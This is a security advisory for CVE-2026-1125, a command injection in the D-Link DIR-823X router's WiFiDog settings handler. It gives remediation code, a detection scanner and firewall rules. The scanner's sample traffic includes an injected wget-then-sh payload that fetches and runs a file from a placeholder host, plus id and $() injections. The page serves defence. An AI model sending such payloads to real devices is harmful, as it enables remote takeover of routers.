CVE-2026-1125 Overview
CVE-2026-1125 is a command injection vulnerability in the D-Link DIR-823X router; the affected firmware builds listed below are 250126 and 250416. The flaw resides in the function sub_412E7C (a decompiler-assigned name, not a vendor symbol) that handles requests to /goform/set_wifidog_settings. An attacker can manipulate the wd_enable argument to inject operating system commands. The vulnerability is exploitable remotely without authentication, and a public exploit has been published.
Critical Impact
Remote attackers can execute arbitrary operating system commands on affected D-Link DIR-823X routers by sending a crafted request to the WiFiDog settings endpoint, potentially yielding full control of the device.
Affected Products
- D-Link DIR-823X router hardware
- D-Link DIR-823X firmware build 250416
- D-Link DIR-823X firmware build 250126
Discovery Timeline
- 2026-01-18 - CVE-2026-1125 published to the National Vulnerability Database
- 2026-04-29 - Last updated in NVD database
Technical Details for CVE-2026-1125
Vulnerability Analysis
The vulnerability resides in the sub_412E7C function within the router's web management interface, specifically the handler for the /goform/set_wifidog_settings endpoint, which configures the WiFiDog captive portal service on the device. The wd_enable parameter supplied in the HTTP request is passed to a shell-executing function without sufficient sanitization. An attacker who can reach the router's web interface can append shell metacharacters to the parameter to inject arbitrary commands. The flaw is classified as CWE-77 (Improper Neutralization of Special Elements used in a Command, 'Command Injection') and its parent CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component, 'Injection').
Root Cause
The root cause is improper neutralization of user-controlled input before it is concatenated into a shell command line. The sub_412E7C handler neither validates nor escapes the wd_enable parameter, so shell metacharacters such as semicolons, backticks, pipes and $() pass through unchanged to the shell invocation, where they are interpreted as command separators and substitutions. A parameter named wd_enable would be expected to carry only an on/off value, so a strict allowlist of the accepted values, combined with invoking the underlying helper directly with an argument vector rather than through a shell, removes the bug class entirely; escaping alone is the fragile fix.
Attack Vector
The attack vector is network-based and, per the advisory, requires no authentication or user interaction. An attacker sends an HTTP POST request to /goform/set_wifidog_settings with a malicious wd_enable value containing shell command separators. Injected commands execute with the privileges of the web server process, which on consumer router firmware is typically root, so a successful injection is equivalent to full device compromise. Public proof-of-concept code documenting the request structure has been released on GitHub.
No verified exploit code is reproduced here. See the GitHub CVE Command Execution Exploit for technical proof-of-concept details.
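The following is an added illustration of the pattern described above, not code from the DIR-823X firmware or from the published proof-of-concept: a Python model stands in for the C handler, and `echo` stands in for whatever helper the real handler invokes (the page does not name it), so the "commands" here only print. The allowed value set {0, 1} is an assumption based on the parameter's name; the firmware's own accepted values are not published. The model shows the two independent layers of the fix: execute with an argument vector instead of a shell, and allowlist the parameter before use.

```python
"""Model of the CVE-2026-1125 root cause: an HTTP parameter handed to a shell.

Added example, not the DIR-823X firmware code. `echo` is a harmless stand-in for
the real helper (unnamed on the page), so every "command" below merely prints.
"""
import subprocess

# Stand-in for the firmware's real helper binary (assumption: not named on the page).
WIFIDOG_HELPER = "echo"

# wd_enable is by its name an on/off flag; these are the only values a handler
# should accept (assumption: the firmware's own accepted set is not published).
ALLOWED_WD_ENABLE = {"0", "1"}


def vulnerable_handler(wd_enable: str) -> str:
    """Vulnerable pattern: the raw parameter is concatenated into a command line
    that /bin/sh parses, so ';', '|', '`' and '$()' in wd_enable become shell syntax."""
    cmd = f"{WIFIDOG_HELPER} {wd_enable}"
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=False)
    return out.stdout


def argv_handler(wd_enable: str) -> str:
    """Layer 1 of the fix: run the helper with an argv vector and no shell
    (execve() with a fixed argv in C). Metacharacters are now just bytes inside
    one argument and are never interpreted as syntax."""
    out = subprocess.run([WIFIDOG_HELPER, wd_enable], capture_output=True, text=True, check=False)
    return out.stdout


def validate_wd_enable(value: str) -> str:
    """Layer 2 of the fix: allowlist the expected values instead of trying to
    escape every shell metacharacter."""
    if value not in ALLOWED_WD_ENABLE:
        raise ValueError(f"wd_enable must be one of {sorted(ALLOWED_WD_ENABLE)}, got {value!r}")
    return value


def hardened_handler(wd_enable: str) -> str:
    """Both layers: validate first, then run without a shell."""
    return argv_handler(validate_wd_enable(wd_enable))


def hardened_rejects(wd_enable: str) -> bool:
    """True if the hardened handler refuses the value before executing anything."""
    try:
        hardened_handler(wd_enable)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed payload in the shape the advisory describes: a valid flag value
    # followed by a shell separator and an attacker-chosen command.
    payload = "1; echo INJECTED"
    print("vulnerable:", repr(vulnerable_handler(payload)))  # two commands ran
    print("argv only :", repr(argv_handler(payload)))        # one command, literal argument
    print("hardened  :", "rejected" if hardened_rejects(payload) else "accepted")
    print("hardened  :", repr(hardened_handler("1")))
```

With the payload above, the vulnerable handler returns two lines of output because the shell ran two commands; the argv-only handler returns the whole string as one literal argument; the hardened handler refuses the value before anything executes. In the firmware the equivalent change is to replace the system()-style call with a direct execve() of the helper and to compare wd_enable against the handful of values the form is allowed to send.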
Detection Methods for CVE-2026-1125
Indicators of Compromise
- HTTP POST requests to /goform/set_wifidog_settings whose wd_enable parameter contains shell metacharacters (;, |, `, $()) or their URL-encoded forms (%3B, %7C, %60, %24%28), since form bodies normally carry these characters encoded
- Unexpected outbound connections originating from the router management plane
- Modified or newly created files in router persistent storage following WiFiDog configuration changes
- Unusual processes spawned by the router's httpd or goahead web service
Detection Strategies
- Inspect web server access logs for requests targeting /goform/set_wifidog_settings with non-standard parameter values; consumer firmware rarely retains such logs, so capture them at an upstream proxy, tap or gateway where the device does not expose them
- Deploy network intrusion detection signatures matching command injection patterns in HTTP request bodies destined for D-Link administrative interfaces
- Monitor for HTTP requests to goform endpoints originating from untrusted network segments or the WAN interface
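The indicator in the list above and the log-inspection strategy can be turned into a scanner. The following is an added example, not code from the page or from D-Link, that runs over constructed request records shaped like what a proxy log or a pcap extraction would provide (method, request target, raw form body). The expected value set {0, 1} for wd_enable is an assumption; the 198.51.100.7 address in the sample payload is a documentation-range placeholder.

```python
"""Scan captured HTTP requests for CVE-2026-1125 exploitation attempts.

Added example, not from the original page or from D-Link. The sample records
below are constructed; real captures are fed in the same (method, target, body) shape.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET_PATH = "/goform/set_wifidog_settings"

# Assumption: wd_enable is an on/off flag; the firmware's accepted set is not published.
EXPECTED_WD_ENABLE = {"0", "1"}

# Metacharacters the advisory lists as IoCs (; | ` $()) plus '&' and newline,
# which /bin/sh also treats as separators.
METACHAR_RE = re.compile(r"[;|&`$\n]")


def decode_params(raw: str) -> dict:
    """Parse a form-encoded string into {name: [values]}, decoding a second time
    so that double-encoded payloads (e.g. %253B for ';') are normalised as well."""
    once = parse_qs(raw, keep_blank_values=True)
    return {name: [unquote(v) for v in values] for name, values in once.items()}


def scan_request(method: str, target: str, body: str) -> list:
    """Return a list of findings for one request; empty if nothing suspicious."""
    url = urlsplit(target)
    if url.path != TARGET_PATH:
        return []
    # Parameters may arrive in the query string or the body; merge both.
    params = decode_params(url.query)
    for name, values in decode_params(body).items():
        params.setdefault(name, []).extend(values)

    findings = []
    for name, values in params.items():
        for value in values:
            hit = METACHAR_RE.search(value) is not None
            if name == "wd_enable" and value not in EXPECTED_WD_ENABLE:
                findings.append({
                    "method": method, "param": name, "value": value,
                    "severity": "high" if hit else "medium",
                    "reason": "shell metacharacter in wd_enable" if hit
                              else "wd_enable outside expected set",
                })
            elif hit:
                findings.append({
                    "method": method, "param": name, "value": value,
                    "severity": "medium",
                    "reason": "shell metacharacter in another parameter",
                })
    return findings


def scan_log(records) -> list:
    """Scan a sequence of (method, target, body) records; returns (index, finding) pairs."""
    return [(i, f) for i, rec in enumerate(records) for f in scan_request(*rec)]


# Constructed sample traffic (not real captures).
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH, "wd_enable=1"),                                   # benign
    ("POST", TARGET_PATH,                                                    # encoded ';'
     "wd_enable=1%3Bwget+http%3A%2F%2F198.51.100.7%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx"),
    ("POST", TARGET_PATH, "wd_enable=1%253B%2560id%2560"),                  # double-encoded
    ("GET", TARGET_PATH + "?wd_enable=%24%28id%29", ""),                     # $() in query string
    ("POST", TARGET_PATH, "wd_enable=2"),                                    # odd value, no metachar
    ("POST", "/goform/form_login", "username=admin%3Bid"),                   # other endpoint: ignored
]

if __name__ == "__main__":
    for index, finding in scan_log(SAMPLE_REQUESTS):
        print(f"record {index}: [{finding['severity']}] {finding['reason']}: {finding['value']!r}")
```

The decode step is the part a signature-based approach tends to miss: a NIDS content match on the raw body must look for the %XX forms of the separators (or operate on the normalised body), and a double-encoded payload passes a single decode untouched. The "outside expected set" finding is deliberately lower severity; it catches probing and tooling that sends unexpected values without tripping the metacharacter check.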
Monitoring Recommendations
- Capture and review router syslog output centrally for anomalous configuration changes to WiFiDog settings
- Alert on any outbound DNS or TCP connections initiated by the router to non-vendor infrastructure
- Track firmware and configuration integrity by periodically comparing the installed firmware image checksum and the running configuration against known-good baselines
How to Mitigate CVE-2026-1125
Immediate Actions Required
- Disable remote (WAN-side) administration on affected DIR-823X devices and restrict the web interface to trusted LAN hosts only
- Block external access to the router's management interface, and at minimum to /goform/set_wifidog_settings, at any upstream firewall or gateway; blocking a single path is easy to bypass, so prefer blocking the management ports outright
- Audit the router for unauthorized configuration changes, persistent backdoors, and modified startup scripts
- Rotate any credentials previously entered into the device, as they may have been exposed
Patch Information
As of the last NVD update, no official patched firmware release from D-Link has been linked to CVE-2026-1125 in the published advisory references. Administrators should monitor the D-Link Official Website for security firmware updates addressing the DIR-823X command injection. Coordination details and submission tracking are available via VulDB CTI ID #341717.
Workarounds
- Place the DIR-823X behind a network segment that restricts access to its management interface using strict ACLs
- Disable the WiFiDog captive portal feature if it is not required in the deployment
- Replace the affected device with a supported model if vendor patches are not released in a timely manner
# Example firewall rules blocking external access to the vulnerable endpoint.
# Assumes the WAN interface is named wan0; adjust for the device or upstream Linux gateway.
# The string match sees only plaintext HTTP and only when the path falls within one segment,
# and it needs the xt_string module, which stock router firmware may lack; treat it as
# defence in depth and prefer dropping WAN-side port 80 entirely where possible.
iptables -I INPUT -i wan0 -p tcp --dport 80 -m string \
--string "/goform/set_wifidog_settings" --algo bm -j DROP
iptables -I INPUT -i wan0 -p tcp --dport 443 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

